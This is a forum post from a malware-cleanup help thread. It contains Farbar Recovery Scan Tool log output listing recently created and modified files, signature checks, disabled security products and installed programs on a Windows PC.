2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 17:57 - 2014-08-17 17:23 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:04 - 2014-08-16 17:05 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-15 20:57 - 2014-08-16 12:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-15 20:56 - 2014-08-16 09:22 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:12 - 2014-08-15 13:13 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:04 - 2014-08-15 13:21 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:12 - 2014-08-15 11:13 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:11 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-25 10:49 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-14 18:20 - 2014-08-20 23:44 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-20 23:44 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-25 10:49 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-14 18:19 - 2014-08-23 11:16 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:19 - 2014-08-04 03:06 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
2014-08-14 18:19 - 2014-07-18 03:11 - 00016064 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\BootDefragDriver.sys
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:15 - 2014-08-14 18:16 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:37 - 2014-08-14 17:40 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:28 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 20:51 - 2014-08-13 20:52 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 18:02 - 2014-08-22 16:10 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 17:58 - 2014-08-15 03:47 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 16:53 - 2014-08-22 21:40 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 16:51 - 2014-08-25 09:16 - 00000000 ____D () C:\ProgramData\IrfuqApivh
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-25 13:41 - 2014-08-23 16:54 - 00000000 ____D () C:\FRST
2014-08-25 13:40 - 2006-11-02 06:33 - 00694332 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-08-25 13:39 - 2014-08-22 13:25 - 00001564 _____ () C:\Windows\setupact.log
2014-08-25 13:39 - 2014-07-18 00:39 - 01282029 _____ () C:\Windows\WindowsUpdate.log
2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-08-25 12:47 - 2006-11-02 08:47 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-08-25 11:10 - 2014-08-25 11:10 - 00043997 _____ () C:\ComboFix.txt
2014-08-25 11:10 - 2014-08-25 10:53 - 00000000 ____D () C:\ComboFix
2014-08-25 11:10 - 2014-08-22 15:52 - 00000000 ____D () C:\Qoobox
2014-08-25 11:08 - 2006-11-02 06:23 - 00000215 _____ () C:\Windows\system.ini
2014-08-25 10:50 - 2011-12-22 18:52 - 00001356 _____ () C:\Users\savas.kyriakidis\AppData\Local\d3d9caps.dat
2014-08-25 10:49 - 2014-08-14 18:20 - 00000342 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-08-25 10:49 - 2014-08-14 18:19 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-08-25 10:48 - 2008-08-06 12:35 - 00000276 _____ () C:\Windows\Tasks\RtlNICDiagVistaStart.job
2014-08-25 10:47 - 2014-08-22 16:12 - 00040016 _____ () C:\Windows\PFRO.log
2014-08-25 10:47 - 2006-11-02 09:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-08-25 10:46 - 2006-11-02 09:01 - 00032640 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-08-25 09:54 - 2011-03-06 00:06 - 00047104 _____ () C:\Users\savas.kyriakidis\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-08-25 09:35 - 2014-08-23 16:30 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-25 09:16 - 2014-08-12 16:51 - 00000000 ____D () C:\ProgramData\IrfuqApivh
2014-08-25 09:16 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\system
2014-08-25 08:26 - 2014-08-23 16:30 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-25 08:26 - 2014-08-23 16:30 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-24 15:38 - 2011-12-29 11:34 - 00000000 ____D () C:\Windows\ERDNT
2014-08-23 16:48 - 2014-08-22 14:00 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-23 16:30 - 2011-03-14 18:46 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-08-23 14:45 - 2006-11-02 07:18 - 00000000 ____D () C:\Windows\schemas
2014-08-23 14:32 - 2011-03-14 18:43 - 00000000 ____D () C:\Windows\pss
2014-08-23 14:22 - 2006-11-02 07:18 - 00000000 ___RD () C:\Users\Public
2014-08-23 14:09 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis
2014-08-23 14:09 - 2011-02-10 21:08 - 00000000 ____D () C:\Users\Rita
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:53 - 2014-08-23 11:51 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:16 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-22 21:40 - 2014-08-22 17:05 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 21:40 - 2014-08-12 16:53 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-22 17:13 - 2012-05-16 21:52 - 00000000 ____D () C:\temp
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:10 - 2014-08-12 18:02 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\42a495
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:15 - 2011-12-22 20:05 - 00000000 ____D () C:\ProgramData\AVAST Software
2014-08-22 13:54 - 2014-08-22 13:41 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-21 00:06 - 2011-03-06 00:06 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Google
2014-08-20 23:44 - 2014-08-14 18:20 - 00000891 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-08-20 23:44 - 2014-08-14 18:20 - 00000879 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-08-20 23:39 - 2008-08-06 12:41 - 00000000 ____D () C:\Program Files\Google
2014-08-20 20:00 - 2009-06-10 23:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark Z700-P700 Series
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
2014-08-19 18:12 - 2014-08-20 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-17 17:23 - 2014-08-16 17:57 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-17 17:23 - 2011-07-10 20:09 - 00000000 ____D () C:\$AVG
2014-08-17 16:31 - 2011-07-10 19:21 - 00000000 ____D () C:\ProgramData\MFAData
2014-08-17 16:29 - 2014-08-17 16:29 - 04763288 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4745.exe
2014-08-17 15:54 - 2014-08-17 15:54 - 04462440 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_avct_stb_all_2014_4335_welcomecmp.exe
2014-08-16 18:01 - 2011-07-10 19:25 - 00000000 ____D () C:\Program Files\AVG
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 17:05 - 2014-08-16 17:05 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 17:05 - 2014-08-16 17:04 - 04755832 _____ (AVG Technologies) C:\Users\savas.kyriakidis\Downloads\avg_free_stb_all_2014_4744_cnet.exe
2014-08-16 12:05 - 2014-08-16 12:05 - 00000000 ____D () C:\ProgramData\SlimWare Utilities Inc
2014-08-16 12:05 - 2014-08-15 20:57 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 12:04 - 2014-08-16 12:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 10:06 - 2012-10-02 18:32 - 00000000 ____D () C:\Program Files\HTC
2014-08-16 09:27 - 2008-08-06 12:49 - 00000000 ____D () C:\Program Files\Citrix
2014-08-16 09:22 - 2014-08-15 20:56 - 00000000 ____D () C:\Program Files\DriverUpdate
2014-08-15 20:56 - 2014-08-15 20:56 - 00000000 ____D () C:\Users\Public\Documents\Downloaded Installers
2014-08-15 20:41 - 2012-10-02 18:45 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\Htc
2014-08-15 19:55 - 2008-08-06 12:37 - 00000000 ____D () C:\Program Files\Microsoft Office
2014-08-15 17:56 - 2006-11-02 08:47 - 00267048 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-15 13:32 - 2014-08-15 13:32 - 06534584 _____ (Systweak Software ) C:\Users\savas.kyriakidis\Downloads\PCDiagnosisProTPSSetup.exe
2014-08-15 13:26 - 2011-06-17 17:39 - 00058896 _____ () C:\Windows\system32\GDIPFONTCACHEV1.DAT
2014-08-15 13:23 - 2014-08-15 13:23 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (3).exe
2014-08-15 13:21 - 2014-08-15 13:04 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-15 13:13 - 2014-08-15 13:12 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (2).exe
2014-08-15 13:11 - 2014-08-15 13:11 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en (1).exe
2014-08-15 13:02 - 2014-08-15 13:02 - 06267504 _____ (TeamViewer GmbH) C:\Users\savas.kyriakidis\Downloads\TeamViewer_Setup_en.exe
2014-08-15 13:01 - 2012-01-24 17:09 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\LogMeIn Rescue Applet
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803173445318587.exe
2014-08-15 11:17 - 2014-08-15 11:17 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_150803172000784607.exe
2014-08-15 11:13 - 2014-08-15 11:12 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012 (1).exe
2014-08-15 11:12 - 2014-08-15 11:11 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\savas.kyriakidis\Downloads\mbam-setup-2.0.2.1012.exe
2014-08-15 03:47 - 2014-08-12 17:58 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-14 19:24 - 2014-08-14 19:24 - 00000000 ___HD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup-Disabled
2014-08-14 18:20 - 2014-08-14 18:20 - 00017216 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-08-14 18:20 - 2014-08-14 18:20 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-08-14 18:19 - 2014-08-14 18:19 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (5).exe
2014-08-14 18:18 - 2014-08-14 18:18 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (4).exe
2014-08-14 18:16 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (3).exe
2014-08-14 18:15 - 2014-08-14 18:15 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (2).exe
2014-08-14 18:14 - 2014-08-14 18:14 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup (1).exe
2014-08-14 18:13 - 2014-08-14 18:13 - 14416448 _____ () C:\Users\savas.kyriakidis\Downloads\gu5setup.exe
2014-08-14 17:40 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809374825884190.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809372042763201.exe
2014-08-14 17:37 - 2014-08-14 17:37 - 03552760 _____ (tuneuppro.com ) C:\Users\savas.kyriakidis\Downloads\tall_140809371092783465.exe
2014-08-13 23:07 - 2013-06-10 19:17 - 00002463 _____ () C:\Users\Public\Desktop\Transporter.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00001666 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-08-13 21:31 - 2014-08-13 21:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-08-13 21:31 - 2014-08-13 21:28 - 00000000 ____D () C:\ProgramData\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-13 21:31 - 2011-12-24 11:26 - 00000000 ____D () C:\Program Files\iTunes
2014-08-13 21:28 - 2014-08-13 21:28 - 00000000 ____D () C:\Program Files\iPod
2014-08-13 21:28 - 2008-09-02 12:28 - 00000000 ____D () C:\Program Files\Common Files\Apple
2014-08-13 21:02 - 2008-09-02 12:28 - 00000000 ____D () C:\ProgramData\Apple
2014-08-13 20:52 - 2014-08-13 20:51 - 00000000 ____D () C:\Program Files\QuickTime
2014-08-13 20:51 - 2014-08-13 20:51 - 00001728 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-08-13 20:51 - 2014-08-13 20:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-08-13 20:41 - 2013-04-22 21:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-08-13 20:18 - 2008-08-06 12:41 - 00000000 ____D () C:\ProgramData\Google
2014-08-12 21:20 - 2014-08-12 21:20 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-08-12 18:03 - 2014-08-12 18:03 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 17:13 - 2011-08-28 07:57 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\ALL Folders
2014-08-12 17:09 - 2011-08-28 08:01 - 00000000 ____D () C:\Users\savas.kyriakidis\Desktop\Desk Top Stuff
2014-08-04 03:06 - 2014-08-14 18:19 - 00101664 _____ (Glarysoft Ltd) C:\Windows\system32\BootDefrag.exe
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-08-25 10:57
 
==================== End Of Log ============================
Link to post
Share on other sites


Addition

 


Additional scan result of Farbar Recovery Scan Tool (x86) Version:23-08-2014

Ran by savas.kyriakidis at 2014-08-25 13:41:46

Running from F:\

Boot Mode: Normal

==========================================================

 

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Microsoft Security Essentials (Disabled - Up to date) {108DAC43-C256-20B7-BB05-914135DA5160}

AV: AVG Internet Security 2011 (Disabled - Up to date) {5A2746B1-DEE9-F85A-FBCD-ADB11639C5F0}

AS: AVG Internet Security 2011 (Disabled - Up to date) {E146A755-F8D3-F7D4-C17D-96C36DBE8F4D}

AS: Microsoft Security Essentials (Disabled - Up to date) {ABEC4DA7-E46C-2F39-81B5-AA334E5D1BDD}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: AVG Firewall (Disabled) {621CC794-9486-F902-D092-0484E8EA828B}

 

==================== Installed Programs ======================

 

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)

32 Bit HP CIO Components Installer (Version: 3.1.1 - Hewlett-Packard) Hidden

6500_E709_eDocs (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709_Help (Version: 1.00.0000 - Hewlett-Packard) Hidden

6500_E709a (Version: 50.0.165.000 - Hewlett-Packard) Hidden

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)

Acrobat.com (Version: 2.0.0 - Adobe Systems Incorporated) Hidden

ActivClient CAC x86 (HKLM\...\{1BE8806A-84F8-4655-A381-0D5524430944}) (Version: 6.2 - ActivIdentity)

Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.2.0.2070 - Adobe Systems Incorporated)

Adobe AIR (Version: 3.2.0.2070 - Adobe Systems Incorporated) Hidden

Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.0.1.152 - Adobe Systems Incorporated)

Adobe Reader X (10.1.2) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.2 - Adobe Systems Incorporated)

Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)

Any Video Converter 3.0.1 (HKLM\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)

Apple Application Support (HKLM\...\{78002155-F025-4070-85B3-7C0453561701}) (Version: 3.0.6 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{941B4CE7-3F5D-443E-A8B7-56A420D2EAFD}) (Version: 7.1.2.6 - Apple Inc.)

Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

ATI Catalyst Control Center (HKLM\...\{055EE59D-217B-43A7-ABFF-507B966405D8}) (Version: 2.007.0731.2233 - )

AVG 2011 (HKLM\...\AVG) (Version: 10.0.1416 - AVG Technologies)

AVG 2011 (Version: 10.0.1388 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1390 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1391 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1392 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1410 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.1416 - AVG Technologies) Hidden

AVG 2011 (Version: 10.0.2109 - AVG Technologies) Hidden

Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)

bpd_scan (Version: 3.00.0000 - Hewlett-Packard) Hidden

BPDSoftware (Version: 50.0.165.000 - Hewlett-Packard) Hidden

BPDSoftware_Ini (Version: 1.00.0000 - Hewlett-Packard) Hidden

Browser Address Error Redirector (HKLM\...\{62230596-37E5-4618-A329-0D21F529A86F}) (Version: 1.00.0000 - Dell)

BufferChm (Version: 120.0.194.000 - Hewlett-Packard) Hidden

Catalyst Control Center Core Implementation (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full Existing (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Full New (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Light (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Common (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Graphics Previews Vista (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Standard (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Chinese Traditional (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization French (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization German (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Hungarian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Italian (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Japanese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Korean (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Polish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Portuguese (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Spanish (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Thai (Version: 2007.0731.2234.38497 - ATI) Hidden

Catalyst Control Center Localization Turkish (Version: 2007.0731.2234.38497 - ATI) Hidden

CCC Help Chinese Standard (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Chinese Traditional (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help English (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help French (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help German (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Hungarian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Italian (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Japanese (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Korean (Version: 2007.0731.2233.38497 - ATI) Hidden

CCC Help Polish (Version: 2007.0731.2233.38497 - ATI) Hidden

